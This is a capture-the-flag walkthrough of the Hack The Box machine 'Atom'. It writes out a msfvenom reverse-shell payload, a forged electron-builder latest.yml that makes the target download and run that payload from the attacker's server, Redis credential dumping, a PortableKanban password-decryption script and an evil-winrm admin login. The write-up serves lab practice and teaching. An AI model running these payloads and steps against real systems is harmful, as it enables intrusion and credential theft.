Atom - [HTB]

Cover Image for Atom - [HTB]
Marmeus
Marmeus

Introduction

Atom is an easy-medium from Hack The Box machine where we have to craft a special .yml file in order to bypass a signature validation in order to obtain a reverse shell as the user yason. Then, in order to become root, we need to extract an encrypted password used in the PortableKanban program stored in a redis database, for a later decryption using a PortableKanban vulnerability.

Enumeration

As always let's find all opened ports in the machine usingf nmap.

# Nmap 7.91 scan initiated Sun Apr 18 07:09:51 2021 as: nmap -sS -p- -T5 -n -oN AllPorts.txt 10.10.10.237
Nmap scan report for 10.10.10.237
Host is up (0.24s latency).
Not shown: 65528 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
443/tcp  open  https
445/tcp  open  microsoft-ds
5985/tcp open  wsman
6379/tcp open  redis
7680/tcp open  pando-pub

# Nmap done at Sun Apr 18 07:23:48 2021 -- 1 IP address (1 host up) scanned in 837.94 seconds

Then, we continue with a deeper scan in each opened port.

# Nmap 7.91 scan initiated Sun Apr 18 07:42:44 2021 as: nmap -sC -sV -n -T5 -p80,135,443,445,5985,6379,7680 -oN Depth.txt 10.10.10.237
Nmap scan report for 10.10.10.237
Host is up (0.19s latency).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Heed Solutions
135/tcp  open  msrpc        Microsoft Windows RPC
443/tcp  open  ssl/http     Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Heed Solutions
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6379/tcp open  redis        Redis key-value store
7680/tcp open  pando-pub?
Service Info: Host: ATOM; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h19m56s, deviation: 4h02m31s, median: -4s
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: ATOM
|   NetBIOS computer name: ATOM\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-04-18T04:43:38-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-04-18T11:43:40
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 18 07:44:21 2021 -- 1 IP address (1 host up) scanned in 96.67 seconds

Looking inside the http service seems like a software company where you can download a software named Heed. Fortunately, we do not have to reverse engineer it.

Heed webpage

Enumerating the samba service there is a shared folder named Software_Updates.

kali@kali:~/Documents/HTB/Atom$ smbclient -L //10.10.10.237/ -U ""
Enter WORKGROUP\'s password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Software_Updates Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.237 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available

Enumerating the folder there is a pdf that we can download.

kali@kali:~/Documents/HTB/Atom$ smbclient //10.10.10.237/Software_Updates
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Apr 18 10:09:00 2021
  ..                                  D        0  Sun Apr 18 10:09:00 2021
  client1                             D        0  Sun Apr 18 10:09:00 2021
  client2                             D        0  Sun Apr 18 10:09:00 2021
  client3                             D        0  Sun Apr 18 10:09:00 2021
  UAT_Testing_Procedures.pdf          A    35202  Fri Apr  9 13:18:08 2021

		4413951 blocks of size 4096. 1344947 blocks available
smb: \> get UAT_Testing_Procedures.pdf
getting file \UAT_Testing_Procedures.pdf of size 35202 as UAT_Testing_Procedures.pdf (55.4 KiloBytes/sec) (average 55.4 KiloBytes/sec)

Reading the document we learned that this application has been encoded with electron-builder and there is a server running inside the machine in charge of updating the application. Furthermore, we can upload updates in the client folders, which will be tested by the QA team to ensure it installs correctly.

Looking on google for "electron-builder update exploit" appears a post about how to craft an latest.yml that allow us to execute commands remotely.

Explotation

In order to turn this into a reverse shell we need to do the following.

First, we need to craft our payload with msfvenom, obtaining their sha512 hash in base64.

kali@kali:/tmp$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.92 LPORT=4445 -f exe > /tmp/h\'eedv.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
kali@kali:/tmp$ shasum -a 512 h\'eedv.exe | cut -d " " -f1 | xxd -r -p | base64
gVVTy+MdPBns1hjE6EwL7L7kCB2O3Zhxm7npfOcYzLsc29IPYOMhfbHz0BSIN5IRGALGF8yzdY2F7XHUCfCKhw==

Secondly, we need to craft our latest.yml payload, adding the hash we calculated before and changing the IP where the server will connect to. This payload will connect to our machine executing the h'eedv.exe file.

Note: After a lot of trial and error, this is the one that work out for me.

kali@kali:/tmp$ cat latest.yml
version: 1.5.5
files:
path: http://<Attacking machine>/h'eedv.exe 
sha512: gVVTy+MdPBns1hjE6EwL7L7kCB2O3Zhxm7npfOcYzLsc29IPYOMhfbHz0BSIN5IRGALGF8yzdY2F7XHUCfCKhw==
releaseDate: '2021-11-23T11:17:02.627Z'

Thirdly, we need to use msfconsole in order to handle the meterpreter session.

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp   
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 4445
lport => 4445
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 0.0.0.0:4445

Fourthly, we need to create an HTTP server in the same folder where our payload was created.

kali@kali:/tmp$ sudo python3 -m http.server 80
[sudo] password for kali: 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Finally, we need to upload the latest.yml into one of the client folders.

kali@kali:/tmp$ smbclient //10.10.10.237/Software_Updates 
Enter WORKGROUP\kali's password:  
smb: \> put latest.yml client1\latest.yml              
putting file latest.yml as \client1\latest.yml (0.2 kb/s) (average 0.3 kb/s)

The result will be an opened session as the user jason, obtaining the user flag.

[*] Sending stage (175174 bytes) to 10.10.10.237
[*] Meterpreter session 3 opened (10.10.14.92:4445 -> 10.10.10.237:56764) at 2021-04-18 06:29:20 -0400


meterpreter > shell
Process 1564 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19042.906]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
atom\jason

Privilege escalation

Inside the jason's downloads folder there is a program named PortableKanban, which has a vulnerability associated capabable of decryting encrypted passwords. So, we need to find some credentials.

kali@kali:~/Documents/HTB/Atom$ searchsploit PortableKanban
----------------------------------------------------------- ---------------------------------
 Exploit Title                                             |  Path
----------------------------------------------------------- ---------------------------------
PortableKanban 4.3.6578.38136 - Encrypted Password Retriev | windows/local/49409.py
----------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

With further enumeration in the C:\Program Files\ directory there is the program named redis, which manages the databases for the program PortableKanban.

In order to access to the redis manager we need the password for the default user which is stored in the redis.windows-service.conf file.

C:\Program Files\Redis>type redis.windows-service.conf        
[...]
# Redis configuration file example
requirepass kidvscat_yes_kidvscat 
[...]

Using redis-cli we can obtain the credentials for the Administrator user in PortableKanban.

kali@kali:~/Documents/HTB/Atom$ redis-cli -h 10.10.10.237                                     │ret service organizations, or for illegal purposes (this is non-binding, these *** ignore law
10.10.10.237:6379> auth kidvscat_yes_kidvscat
OK
10.10.10.237:6379> info  
[...]
# Keyspace        
db0:keys=4,expires=0,avg_ttl=0
[...]
10.10.10.237:6379[1]> SELECT 0
OK
10.10.10.237:6379> KEYS *
1) "pk:ids:MetaDataClass"
2) "pk:ids:User"
3) "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
4) "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
10.10.10.237:6379> GET "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
"\"Id\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"Name\":\"Administrator\",\"Initials\":\"\",\"Email\":\"\",\"EncryptedPassword\":\"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\",\"Role\":\"Admin\",\"Inactive\":false,\"TimeStamp\":637530169606440253}"

Now, we can use the PortableKanban vulnerability in order to obtain the Administrator password. However, we need to modify the script so it decrypts directly the flag without crafting a PortableKanban.pk3 file. The modified script is the following.

kali@kali:~/Documents/HTB/Atom$ cat kanbanPassRetrieval.py 
import json
import base64
from des import * #python3 -m pip install des
import sys

try:
        path = sys.argv[1]
except:
        exit("Supply path to PortableKanban.pk3 as argv1")

def decode(hash):
        hash = base64.b64decode(hash.encode('utf-8'))
        key = DesKey(b"7ly6UznJ")
        return key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8')

print("{}".format(decode(sys.argv[1])))

Executing the script we obtain the password.

kali@kali:~/Documents/HTB/Atom$ python3 kanbanPassRetrieval.py Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi 
kidvscat_admin_@123

The password can be used to obtain a shell as Administrator, with evil-winrm, obtaining the root flag.

kali@kali:~/Documents/HTB/Atom$ evil-winrm -u Administrator -p 'kidvscat_admin_@123' -i 10.10.10.237

Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Documents> dir

    Directory: C:\Users\Administrator\Documents

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          4/2/2021   8:22 PM            608 dump.rdb
-a----          4/2/2021  10:49 PM            204 run.bat


[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Documents> cd ..\Desktop
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Desktop> type root.txt
[CENSORED]